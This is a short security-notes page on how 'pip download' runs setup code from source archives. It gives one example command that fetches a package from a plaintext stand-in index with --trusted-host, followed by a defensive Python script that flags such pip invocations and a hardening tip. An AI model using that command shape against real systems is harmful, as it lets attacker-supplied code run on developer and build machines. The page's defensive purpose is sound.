# PIP Exploits
## pip download
Python's pip executes code from downloaded tar files (source archives) even when only the `download` option is used.
Therefore, a handcrafted Python module needs to be created and built.
After that, pip can be used in the following way:
```sh
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
```
A detailed blog post on this has been written by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/).
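
A defender's check for the command shape shown above, as an added example that is not from the original page or the linked post: it parses pip command lines (for instance from shell history or CI logs) and flags the options that let a source archive from an untrusted index be built. The finding names, `APPROVED_INDEX_HOSTS` and the sample lines are assumptions made for this example.

```python
import shlex
from urllib.parse import urlparse

VALUE_OPTS = {"--index-url", "-i", "--extra-index-url", "--trusted-host", "--only-binary"}
INDEX_OPTS = {"--index-url", "-i", "--extra-index-url"}
FETCH_CMDS = {"download", "install", "wheel"}
APPROVED_INDEX_HOSTS = {"pypi.org"}  # assumption: replace with your own allowlist

def parse_options(argv):
    """Collect (option, value) pairs from '--opt value' and '--opt=value' forms."""
    pairs, i = [], 0
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--") and "=" in tok:
            pairs.append(tuple(tok.split("=", 1)))
        elif tok in VALUE_OPTS and i + 1 < len(argv):
            pairs.append((tok, argv[i + 1]))
            i += 1  # skip the value token
        i += 1
    return pairs

def audit_pip_command(line):
    """Return a sorted list of finding names for one pip command line."""
    argv = shlex.split(line)
    if not {"pip", "pip3"} & set(argv[:3]) or not FETCH_CMDS & set(argv):
        return []  # not a pip command that fetches packages
    opts = parse_options(argv)
    findings = set()
    if ("--only-binary", ":all:") not in opts:
        # Without this, pip may fetch a source archive and run its setup code.
        findings.add("sdist-allowed")
    for name, value in opts:
        if name in INDEX_OPTS:
            url = urlparse(value)
            if url.scheme != "https":
                findings.add("plaintext-index")
            if url.hostname not in APPROVED_INDEX_HOSTS:
                findings.add("unapproved-index")
        elif name == "--trusted-host":
            findings.add("trusted-host-override")
    return sorted(findings)

# Constructed sample lines: the command from this page and a hardened variant.
SAMPLES = [
    "pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v",
    "pip download requests --only-binary=:all: --index-url https://pypi.org/simple",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_pip_command(sample) or ["ok"], "<-", sample)
```

With `--only-binary=:all:` pip refuses source archives and fetches only wheels, so no package setup code is run during `pip download`.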